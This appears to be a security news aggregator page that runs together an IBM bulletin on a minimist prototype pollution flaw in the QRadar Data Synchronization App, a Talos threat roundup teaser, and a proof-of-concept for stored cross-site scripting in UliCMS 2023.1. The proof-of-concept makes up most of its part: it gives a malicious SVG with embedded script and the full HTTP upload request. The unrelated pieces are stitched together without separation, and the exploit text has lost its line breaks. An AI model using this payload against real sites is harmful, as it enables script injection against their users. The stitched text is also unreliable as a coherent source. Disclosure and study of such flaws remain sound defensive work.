**DESCRIPTION:**   minimist could provide weaker than expected security, caused by a prototype pollution flaw. By sending a specially crafted request, a remote attacker could exploit this vulnerability to add or modify properties of Object.prototype.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/177780 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM QRadar Data Synchronization App

1.0 - 3.0.1

  

**Remediation/Fixes**

IBM encourages customers to update their systems promptly.

Update to 3.1.0

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

03 Apr 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSBQAC","label":"IBM Security QRadar SIEM"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"3.0.1","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2022-22313: Security Bulletin: IBM QRadar Data Synchronization App for IBM QRadar SIEM is vulnerable to using components with known vulnerabilities

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 28 and May 5. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for April 28 to May 5

UliCMS version 2023-1 Sniffing-Vicuna suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:  Stored Xss#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /dist/admin/fm/upload.php HTTP/1.1Host: localhostContent-Length: 663sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABClX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36sec-ch-ua-platform: "Linux"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/dist/admin/fm/dialog.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delvConnection: close------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="fldr"------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryK3CvcSs8xZwzABCl--3. Go to http://localhost/dist/content/SVG_XSS.svg

Tag

#js